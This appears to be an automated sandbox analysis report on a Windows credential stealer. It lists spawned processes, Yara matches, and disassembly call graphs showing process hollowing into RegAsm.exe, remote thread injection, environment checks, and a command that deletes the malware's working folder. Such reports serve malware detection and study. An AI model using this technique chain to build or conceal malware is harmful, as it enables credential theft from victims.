                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:16:52:36
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:16:52:36
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0xdf0000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2377742353.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:16:52:39
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJECFIECBGDG" & exit
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:16:52:39
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:16:52:40
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:timeout /t 10
                                                      Imagebase:0x590000
                                                      File size:25'088 bytes
                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:16:52:40
                                                      Start date:29/08/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760
                                                      Imagebase:0xac0000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:31.2%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:37.9%
                                                        Total number of Nodes:29
                                                        Total number of Limit Nodes:0
                                                        execution_graph 290 2c12481 293 2c124b9 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 290->293 292 2c12696 WriteProcessMemory 294 2c126db 292->294 293->292 295 2c126e0 WriteProcessMemory 294->295 296 2c1271d WriteProcessMemory Wow64SetThreadContext ResumeThread 294->296 295->294 297 13e0988 298 13e09a5 297->298 302 13e0a29 298->302 303 13e04f8 298->303 304 13e0f40 VirtualProtect 303->304 306 13e09f7 304->306 306->302 307 13e0504 306->307 308 13e1000 CreateRemoteThread 307->308 310 13e10ab 308->310 310->302 311 13e0978 312 13e09a5 311->312 313 13e04f8 VirtualProtect 312->313 316 13e0a29 312->316 314 13e09f7 313->314 315 13e0504 CreateRemoteThread 314->315 314->316 315->316 317 13e0ff8 318 13e104e CreateRemoteThread 317->318 320 13e10ab 318->320 321 13e0b44 325 13e0b7f 321->325 322 13e0f8b VirtualProtect 323 13e0fc8 322->323 324 13e0f1f 325->322 325->324

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_013E00BC 1 Function_013E04BD 2 Function_013E04B9 3 Function_013E00B0 4 Function_02C12BCF 5 Function_02C12B4F 6 Function_013E012C 7 Function_013E04AC 8 Function_013E00A0 9 Function_02C12B5F 10 Function_02C12BDF 11 Function_013E0A9C 12 Function_013E011C 13 Function_013E0495 14 Function_013E0090 15 Function_013E0510 16 Function_02C12B6F 17 Function_013E0491 18 Function_013E010C 19 Function_013E048D 20 Function_013E0988 20->15 23 Function_013E0504 20->23 32 Function_013E04F8 20->32 41 Function_013E04EC 20->41 21 Function_013E0489 22 Function_02C12AF6 24 Function_013E0485 25 Function_013E0080 26 Function_013E0100 27 Function_02C12AFF 28 Function_02C12B7F 29 Function_013E0481 30 Function_02C12481 31 Function_013E047D 33 Function_013E0978 33->15 33->23 33->32 33->41 34 Function_013E0FF8 35 Function_013E0479 36 Function_013E0475 37 Function_013E0070 38 Function_013E00F0 39 Function_02C12B8F 40 Function_02C12B0F 42 Function_013E08E8 43 Function_013E0468 44 Function_013E00E4 45 Function_013E0060 46 Function_02C12B1F 47 Function_02C12B9F 48 Function_013E045C 49 Function_013E08D8 50 Function_013E10D8 51 Function_013E04D7 52 Function_013E00D4 53 Function_013E0A52 54 Function_013E0450 55 Function_02C12B2F 56 Function_02C12BAF 57 Function_013E004D 58 Function_013E0848 59 Function_013E00C8 60 Function_02C122B6 61 Function_013E0444 62 Function_013E0B44 63 Function_013E0140 64 Function_02C12B3F 65 Function_02C12BBF 66 Function_013E04C1

                                                        Executed Functions

                                                        Function 02C12481 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02C125F0
                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02C12603
                                                        • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02C12621
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C12645
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02C12670
                                                        • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02C126C8
                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02C12713
                                                        • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02C12751
                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 02C1278D
                                                        • ResumeThread.KERNELBASE(?), ref: 02C1279C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1640004065.0000000002C12000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C12000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2c12000_file.jbxd
                                                        Similarity
                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                        • String ID: GetP$Load$aryA$ress
                                                        • API String ID: 2687962208-977067982
                                                        • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                        • Instruction ID: c31300ef8a925da744a4e65c9714a27e027b0a778933c4bd99f93b9ff5ae7a27
                                                        • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                        • Instruction Fuzzy Hash: 17B1E57660028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94
                                                        Function 013E0B44 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 336memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 23 13e0b44-13e0b96 26 13e0b98-13e0ba6 23->26 28 13e0bac-13e0bfc 26->28 29 13e0f27-13e0fc6 VirtualProtect 26->29 28->29 30 13e0c02-13e0c10 28->30 36 13e0fcd-13e0fe6 29->36 37 13e0fc8 29->37 30->29 31 13e0c16-13e0c21 30->31 31->26 33 13e0c27-13e0c29 31->33 35 13e0c2c-13e0c34 33->35 35->29 38 13e0c3a-13e0c4a 35->38 37->36 38->29 40 13e0c50-13e0c5c 38->40 41 13e0c5e-13e0c64 40->41 42 13e0c65-13e0c6a 40->42 41->42 42->29 43 13e0c70-13e0c77 42->43 43->29 44 13e0c7d-13e0c83 43->44 44->29 45 13e0c89-13e0c94 44->45 45->35 46 13e0c96-13e0ca8 45->46 47 13e0cae-13e0cca 46->47 48 13e0f1f-13e0f26 46->48 49 13e0ccc-13e0cd3 47->49 50 13e0cd4-13e0cdc 47->50 49->50 50->29 51 13e0ce2-13e0cee 50->51 52 13e0cf7-13e0cfc 51->52 53 13e0cf0-13e0cf6 51->53 52->29 54 13e0d02-13e0d09 52->54 53->52 54->29 55 13e0d0f-13e0d15 54->55 55->29 56 13e0d1b-13e0d31 55->56 57 13e0d3b-13e0e14 56->57 58 13e0d33-13e0d3a 56->58 62 13e0e1f-13e0e25 57->62 63 13e0e16 57->63 58->57 64 13e0e28-13e0e4a 62->64 63->64 65 13e0e18-13e0e1d 63->65 66 13e0e4c 64->66 67 13e0e55-13e0e5c 64->67 65->62 65->64 68 13e0e5e-13e0e71 66->68 69 13e0e4e-13e0e53 66->69 70 13e0e7b-13e0e84 67->70 68->70 69->67 69->68 71 13e0e86-13e0e90 70->71 72 13e0e93-13e0e9a 70->72 71->72 73 13e0e9e-13e0ead 72->73 74 13e0e9c 72->74 75 13e0eb3-13e0eb9 73->75 74->75 76 13e0ebb 75->76 77 13e0ec4 75->77 78 13e0ebd-13e0ec2 76->78 79 13e0ec6-13e0ee0 76->79 80 13e0eea-13e0ef6 77->80 78->77 78->79 79->80 80->29 81 13e0ef8-13e0f01 80->81 81->29 83 13e0f03-13e0f19 81->83 83->47 83->48
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(03C13594,?,?,?), ref: 013E0FB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639802048.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_13e0000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: #l>@$<1i;
                                                        • API String ID: 544645111-2199172079
                                                        • Opcode ID: 97e6c01bc54cdf555c74b29148c60a50e354753f0c9918c4cfbfffe6498f6528
                                                        • Instruction ID: bd7332deca0d85bfb694bb0bd130bf4c362c0e19568e866a571c3a5011dd7a33
                                                        • Opcode Fuzzy Hash: 97e6c01bc54cdf555c74b29148c60a50e354753f0c9918c4cfbfffe6498f6528
                                                        • Instruction Fuzzy Hash: AFD17DB0E007698BDB15CFA9C884AADFBF2BF48318F248559E459AB346C3749945CF90
                                                        Function 013E0504 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 84 13e0504-13e105a 87 13e105c-13e1068 84->87 88 13e106a-13e10a9 CreateRemoteThread 84->88 87->88 89 13e10ab-13e10b1 88->89 90 13e10b2-13e10c6 88->90 89->90
                                                        APIs
                                                        • CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 013E109C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639802048.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_13e0000_file.jbxd
                                                        Similarity
                                                        • API ID: CreateRemoteThread
                                                        • String ID:
                                                        • API String ID: 4286614544-0
                                                        • Opcode ID: dcd64f342d39118b01248a1ae8579724e47190ac0fc3918863b212c0439cd65f
                                                        • Instruction ID: c17c3907ca7565500621f86f67a91aa192d63a47a21282598432c4998fb368b4
                                                        • Opcode Fuzzy Hash: dcd64f342d39118b01248a1ae8579724e47190ac0fc3918863b212c0439cd65f
                                                        • Instruction Fuzzy Hash: 873102B5A00349DFCB14DF99D888ADEBFF5FB48314F20842AE918A7350D375A954CBA4
                                                        Function 013E0FF8 Relevance: 1.6, APIs: 1, Instructions: 67threadinjectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 92 13e0ff8-13e105a 94 13e105c-13e1068 92->94 95 13e106a-13e10a9 CreateRemoteThread 92->95 94->95 96 13e10ab-13e10b1 95->96 97 13e10b2-13e10c6 95->97 96->97
                                                        APIs
                                                        • CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 013E109C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639802048.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_13e0000_file.jbxd
                                                        Similarity
                                                        • API ID: CreateRemoteThread
                                                        • String ID:
                                                        • API String ID: 4286614544-0
                                                        • Opcode ID: e396055f2bdc0c478d4da4d54b45f30b6d7d6ac687b428662f47240bdd05b651
                                                        • Instruction ID: f16b9eeb4561adf75709cb8dc2f249f15f94f67aa16a7f4c21561dfcdb206db7
                                                        • Opcode Fuzzy Hash: e396055f2bdc0c478d4da4d54b45f30b6d7d6ac687b428662f47240bdd05b651
                                                        • Instruction Fuzzy Hash: 1821F0B5A002499FCB14CFA9D984ADEBFF1FB48310F20802AE919A7250D375A954CBA4
                                                        Function 013E04F8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 99 13e04f8-13e0fc6 VirtualProtect 102 13e0fcd-13e0fe6 99->102 103 13e0fc8 99->103 103->102
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(03C13594,?,?,?), ref: 013E0FB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639802048.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_13e0000_file.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 9a1981425c0c0fd1f4c448a87779d90166944194337226687923d6ef286e526a
                                                        • Instruction ID: 1b8ef88fc83a7cda3f932b0b83186c1c60e7ae400ffba68dc0403a06267dce0d
                                                        • Opcode Fuzzy Hash: 9a1981425c0c0fd1f4c448a87779d90166944194337226687923d6ef286e526a
                                                        • Instruction Fuzzy Hash: EB21E0B5905619AFCB04DF9AC884ADEFBF4FB48314F10812AE918A7240C3B4A954CFA5

                                                        Execution Graph

                                                        Execution Coverage:4.2%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:3.7%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:43
                                                        execution_graph 91604 415730 91644 4010b4 91604->91644 91606 41573e 91649 401134 GetTempPathW 91606->91649 91609 4157df 91659 401077 FlsAlloc 91609->91659 91610 41575f 15 API calls 91610->91609 91612 4157e4 18 API calls 91660 401043 91612->91660 91615 401043 9 API calls 91616 4158ed 18 API calls 91615->91616 91617 401043 9 API calls 91616->91617 91618 415970 18 API calls 91617->91618 91668 402356 91618->91668 91626 415b84 91770 40e6e6 lstrlenA 91626->91770 91629 40e6e6 3 API calls 91630 415bab 91629->91630 91631 40e6e6 3 API calls 91630->91631 91632 415bb2 91631->91632 91774 40e64d 91632->91774 91634 415bbb 91635 415bdb OpenEventA 91634->91635 91636 415c06 91635->91636 91637 415c0a 91636->91637 91638 415bee CloseHandle 91636->91638 91641 415c12 37 API calls 91637->91641 92154 40e778 91638->92154 91640 415bfd OpenEventA 91640->91636 91778 414827 91641->91778 92155 40108a GetProcessHeap HeapAlloc 91644->92155 91647 401120 GetProcessHeap HeapFree 91647->91606 91648 4010d0 10 API calls 91648->91647 91650 401162 wsprintfW 91649->91650 91651 401294 LoadLibraryA 91649->91651 91650->91651 91652 40118f 91650->91652 91651->91609 91651->91610 91653 401194 CreateFileW 91652->91653 91653->91651 91654 4011bc 7 API calls 91653->91654 91654->91651 91655 40120a 91654->91655 91655->91651 91656 401213 memset FindCloseChangeNotification CreateFileW 91655->91656 91658 401262 memset GetProcessHeap RtlFreeHeap CloseHandle 91655->91658 91656->91651 91657 40124b ReadFile 91656->91657 91657->91651 91657->91655 91658->91651 91658->91653 91659->91612 92157 40e828 GetProcessHeap HeapAlloc GetComputerNameA 91660->92157 91663 401076 18 API calls 91663->91615 91664 401059 92159 40e7f6 GetProcessHeap HeapAlloc GetUserNameA 91664->92159 91666 401063 strcmp 91666->91663 91667 40106f ExitProcess 91666->91667 92160 4020fd 35 API calls 91668->92160 91670 402368 91671 4020fd 80 API calls 91670->91671 91672 40237e 91671->91672 91673 4020fd 80 API calls 91672->91673 91674 402396 91673->91674 91675 4020fd 80 API calls 91674->91675 91676 4023ac 91675->91676 91677 4020fd 80 API calls 91676->91677 91678 4023c2 91677->91678 91679 4020fd 80 API calls 91678->91679 91680 4023d7 91679->91680 91681 4020fd 80 API calls 91680->91681 91682 4023f0 91681->91682 91683 4020fd 80 API calls 91682->91683 91684 402406 91683->91684 91685 4020fd 80 API calls 91684->91685 91686 40241c 91685->91686 91687 4020fd 80 API calls 91686->91687 91688 402432 91687->91688 91689 4020fd 80 API calls 91688->91689 91690 402448 91689->91690 91691 4020fd 80 API calls 91690->91691 91692 40245e 91691->91692 91693 4020fd 80 API calls 91692->91693 91694 402476 91693->91694 91695 4020fd 80 API calls 91694->91695 91696 40248c 91695->91696 91697 4020fd 80 API calls 91696->91697 91698 4024a2 91697->91698 91699 4020fd 80 API calls 91698->91699 91700 4024b8 91699->91700 91701 4020fd 80 API calls 91700->91701 91702 4024ce 91701->91702 91703 4020fd 80 API calls 91702->91703 91704 4024e4 91703->91704 91705 4020fd 80 API calls 91704->91705 91706 4024fd 91705->91706 91707 4020fd 80 API calls 91706->91707 91708 402513 91707->91708 91709 4020fd 80 API calls 91708->91709 91710 402529 91709->91710 91711 4020fd 80 API calls 91710->91711 91712 40253f 91711->91712 91713 4020fd 80 API calls 91712->91713 91714 402555 91713->91714 91715 4020fd 80 API calls 91714->91715 91716 40256a 91715->91716 91717 4020fd 80 API calls 91716->91717 91718 402583 91717->91718 91719 4020fd 80 API calls 91718->91719 91720 402599 91719->91720 91721 4020fd 80 API calls 91720->91721 91722 4025af 91721->91722 91723 4020fd 80 API calls 91722->91723 91724 4025c5 91723->91724 91725 4020fd 80 API calls 91724->91725 91726 4025da 91725->91726 91727 4020fd 80 API calls 91726->91727 91728 4025f0 91727->91728 91729 4020fd 80 API calls 91728->91729 91730 402609 91729->91730 91731 4020fd 80 API calls 91730->91731 91732 40261f 91731->91732 91733 4020fd 80 API calls 91732->91733 91734 402635 91733->91734 91735 4020fd 80 API calls 91734->91735 91736 40264b 91735->91736 91737 4020fd 80 API calls 91736->91737 91738 402661 91737->91738 91739 4020fd 80 API calls 91738->91739 91740 402676 91739->91740 91741 4020fd 80 API calls 91740->91741 91742 40268f 91741->91742 91743 4020fd 80 API calls 91742->91743 91744 4026a5 91743->91744 91745 4020fd 80 API calls 91744->91745 91746 4026bb 91745->91746 91747 4020fd 80 API calls 91746->91747 91748 4026d1 18 API calls 91747->91748 91749 415e5b 91748->91749 92164 415e38 GetPEB 91749->92164 91751 415e60 91752 415e6d 91751->91752 91753 41605f LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 91751->91753 91762 415e8e 20 API calls 91752->91762 91754 4160bd GetProcAddress 91753->91754 91755 4160cf 91753->91755 91754->91755 91756 416101 91755->91756 91757 4160d8 GetProcAddress GetProcAddress 91755->91757 91758 41610a GetProcAddress 91756->91758 91759 41611c 91756->91759 91757->91756 91758->91759 91760 416125 GetProcAddress 91759->91760 91761 416137 91759->91761 91760->91761 91763 416140 GetProcAddress GetProcAddress 91761->91763 91764 415a76 18 API calls 91761->91764 91762->91753 91763->91764 91765 40e58f 91764->91765 91766 40e59d 91765->91766 91767 40e5bf 18 API calls 91766->91767 91768 40e5b5 lstrcpyA 91766->91768 91769 40e7f6 GetProcessHeap HeapAlloc GetUserNameA 91767->91769 91768->91767 91769->91626 91772 40e711 91770->91772 91771 40e737 91771->91629 91772->91771 91773 40e724 lstrcpyA lstrcatA 91772->91773 91773->91771 91775 40e663 91774->91775 91776 40e68c 91775->91776 91777 40e684 lstrcpyA 91775->91777 91776->91634 91777->91776 91779 414834 91778->91779 91780 40e58f lstrcpyA 91779->91780 91781 414848 91780->91781 92165 40e603 lstrlenA 91781->92165 91784 40e603 2 API calls 91785 414873 91784->91785 92169 4026db 91785->92169 91789 414981 91790 40e58f lstrcpyA 91789->91790 91984 414c17 91789->91984 91792 41499c 91790->91792 91794 40e6e6 3 API calls 91792->91794 91793 414c3c 91795 40e64d lstrcpyA 91793->91795 91796 4149ad 91794->91796 91797 414c4a 91795->91797 91798 40e64d lstrcpyA 91796->91798 91800 40e58f lstrcpyA 91797->91800 91799 4149b6 91798->91799 91803 40e6e6 3 API calls 91799->91803 91801 414c5e 91800->91801 91802 40e6e6 3 API calls 91801->91802 91804 414c7e 91802->91804 91805 4149cb 91803->91805 92767 40e694 91804->92767 91807 40e64d lstrcpyA 91805->91807 91809 4149d4 91807->91809 91811 40e6e6 3 API calls 91809->91811 91810 40e64d lstrcpyA 91814 414c91 91810->91814 91812 4149e9 91811->91812 91813 40e64d lstrcpyA 91812->91813 91815 4149f2 91813->91815 91816 414cad CreateDirectoryA 91814->91816 91818 40e6e6 3 API calls 91815->91818 92771 401324 91816->92771 91820 414a0b 91818->91820 91822 40e64d lstrcpyA 91820->91822 91824 414a14 91822->91824 91823 414cd1 92868 411af0 91823->92868 91827 40e6e6 3 API calls 91824->91827 91826 414ce0 91830 40e64d lstrcpyA 91826->91830 91828 414a2d 91827->91828 91829 40e64d lstrcpyA 91828->91829 91831 414a36 91829->91831 91832 414cfd 91830->91832 91835 40e6e6 3 API calls 91831->91835 91833 40e64d lstrcpyA 91832->91833 91834 414d0f 91833->91834 92875 40e5c6 91834->92875 91837 414a4f 91835->91837 91839 40e64d lstrcpyA 91837->91839 91841 414a58 91839->91841 91840 40e6e6 3 API calls 91842 414d35 91840->91842 91845 40e6e6 3 API calls 91841->91845 91843 40e64d lstrcpyA 91842->91843 91844 414d41 91843->91844 91847 40e694 2 API calls 91844->91847 91846 414a71 91845->91846 91848 40e64d lstrcpyA 91846->91848 91849 414d5f 91847->91849 91850 414a7a 91848->91850 91851 40e64d lstrcpyA 91849->91851 91852 40e6e6 3 API calls 91850->91852 91855 414d6b 91851->91855 91853 414a93 91852->91853 91854 40e64d lstrcpyA 91853->91854 91856 414a9c 91854->91856 91857 414d83 InternetOpenA 91855->91857 91860 40e6e6 3 API calls 91856->91860 92879 40e778 91857->92879 91859 414da0 InternetOpenA 91861 40e5c6 lstrcpyA 91859->91861 91862 414ab5 91860->91862 91863 414dc7 91861->91863 91864 40e64d lstrcpyA 91862->91864 91866 40e58f lstrcpyA 91863->91866 91865 414abe 91864->91865 91869 40e6e6 3 API calls 91865->91869 91867 414dd7 91866->91867 92880 40f08a GetWindowsDirectoryA 91867->92880 91871 414ad7 91869->91871 91873 40e64d lstrcpyA 91871->91873 91872 40e5c6 lstrcpyA 91874 414df0 91872->91874 91875 414ae0 91873->91875 92899 403f90 91874->92899 91878 40e6e6 3 API calls 91875->91878 91877 414df6 93035 410c6a 91877->93035 91880 414af9 91878->91880 91882 40e64d lstrcpyA 91880->91882 91881 414dfe 91884 40e58f lstrcpyA 91881->91884 91883 414b02 91882->91883 91888 40e6e6 3 API calls 91883->91888 91885 414e2c 91884->91885 91886 401324 lstrcpyA 91885->91886 91887 414e3d 91886->91887 93055 405af9 91887->93055 91890 414b1b 91888->91890 91892 40e64d lstrcpyA 91890->91892 91891 414e43 93232 41073c 91891->93232 91894 414b24 91892->91894 91898 40e6e6 3 API calls 91894->91898 91895 414e4b 91896 40e58f lstrcpyA 91895->91896 91897 414e6d 91896->91897 91899 401324 lstrcpyA 91897->91899 91900 414b3d 91898->91900 91902 414e7e 91899->91902 91901 40e64d lstrcpyA 91900->91901 91903 414b46 91901->91903 91904 405af9 40 API calls 91902->91904 91907 40e6e6 3 API calls 91903->91907 91905 414e84 91904->91905 93240 410547 91905->93240 91909 414b5f 91907->91909 91908 414e8c 91910 40e58f lstrcpyA 91908->91910 91911 40e64d lstrcpyA 91909->91911 91912 414eae 91910->91912 91914 414b68 91911->91914 91913 401324 lstrcpyA 91912->91913 91915 414ebf 91913->91915 91918 40e6e6 3 API calls 91914->91918 91916 405af9 40 API calls 91915->91916 91917 414ec5 91916->91917 93251 410689 91917->93251 91920 414b81 91918->91920 91922 40e64d lstrcpyA 91920->91922 91921 414ecd 91923 401324 lstrcpyA 91921->91923 91924 414b8a 91922->91924 91925 414ede 91923->91925 91927 40e6e6 3 API calls 91924->91927 93260 412af8 91925->93260 91929 414ba3 91927->91929 91931 40e64d lstrcpyA 91929->91931 91933 414bac 91931->91933 91935 40e6e6 3 API calls 91933->91935 91938 414bc5 91935->91938 91940 40e64d lstrcpyA 91938->91940 91942 414bce 91940->91942 91946 40e6e6 3 API calls 91942->91946 91948 414be7 91946->91948 91951 40e64d lstrcpyA 91948->91951 91961 414bf0 91951->91961 92753 40fe05 _EH_prolog CreateToolhelp32Snapshot Process32First 91961->92753 91972 414c06 91972->91984 92758 41931b 91972->92758 92761 40f6c3 91984->92761 92154->91640 92156 4010a5 92155->92156 92156->91647 92156->91648 92158 40104d strcmp 92157->92158 92158->91663 92158->91664 92159->91666 92161 402202 92160->92161 92162 4022c4 22 API calls 92160->92162 92163 40220b 23 API calls 92161->92163 92162->91670 92163->92162 92163->92163 92164->91751 92167 40e61b 92165->92167 92166 40e646 92166->91784 92167->92166 92168 40e63c lstrcpyA 92167->92168 92168->92166 92170 4020fd 80 API calls 92169->92170 92171 4026ef 92170->92171 92172 4020fd 80 API calls 92171->92172 92173 402705 92172->92173 92174 4020fd 80 API calls 92173->92174 92175 40271b 92174->92175 92176 4020fd 80 API calls 92175->92176 92177 402733 92176->92177 92178 4020fd 80 API calls 92177->92178 92179 40274b 92178->92179 92180 4020fd 80 API calls 92179->92180 92181 402761 92180->92181 92182 4020fd 80 API calls 92181->92182 92183 40277a 92182->92183 92184 4020fd 80 API calls 92183->92184 92185 402790 92184->92185 92186 4020fd 80 API calls 92185->92186 92187 4027a6 92186->92187 92188 4020fd 80 API calls 92187->92188 92189 4027bc 92188->92189 92190 4020fd 80 API calls 92189->92190 92191 4027d1 92190->92191 92192 4020fd 80 API calls 92191->92192 92193 4027e7 92192->92193 92194 4020fd 80 API calls 92193->92194 92195 402800 92194->92195 92196 4020fd 80 API calls 92195->92196 92197 402816 92196->92197 92198 4020fd 80 API calls 92197->92198 92199 40282c 92198->92199 92200 4020fd 80 API calls 92199->92200 92201 402842 92200->92201 92202 4020fd 80 API calls 92201->92202 92203 402858 92202->92203 92204 4020fd 80 API calls 92203->92204 92205 40286e 92204->92205 92206 4020fd 80 API calls 92205->92206 92207 402887 92206->92207 92208 4020fd 80 API calls 92207->92208 92209 40289c 92208->92209 92210 4020fd 80 API calls 92209->92210 92211 4028b2 92210->92211 92212 4020fd 80 API calls 92211->92212 92213 4028ca 92212->92213 92214 4020fd 80 API calls 92213->92214 92215 4028df 92214->92215 92216 4020fd 80 API calls 92215->92216 92217 4028f5 92216->92217 92218 4020fd 80 API calls 92217->92218 92219 40290e 92218->92219 92220 4020fd 80 API calls 92219->92220 92221 402924 92220->92221 92222 4020fd 80 API calls 92221->92222 92223 402939 92222->92223 92224 4020fd 80 API calls 92223->92224 92225 40294f 92224->92225 92226 4020fd 80 API calls 92225->92226 92227 402964 92226->92227 92228 4020fd 80 API calls 92227->92228 92229 402979 92228->92229 92230 4020fd 80 API calls 92229->92230 92231 402992 92230->92231 92232 4020fd 80 API calls 92231->92232 92233 4029a7 92232->92233 92234 4020fd 80 API calls 92233->92234 92235 4029bd 92234->92235 92236 4020fd 80 API calls 92235->92236 92237 4029d3 92236->92237 92238 4020fd 80 API calls 92237->92238 92239 4029e9 92238->92239 92240 4020fd 80 API calls 92239->92240 92241 4029fe 92240->92241 92242 4020fd 80 API calls 92241->92242 92243 402a17 92242->92243 92244 4020fd 80 API calls 92243->92244 92245 402a2d 92244->92245 92246 4020fd 80 API calls 92245->92246 92247 402a43 92246->92247 92248 4020fd 80 API calls 92247->92248 92249 402a58 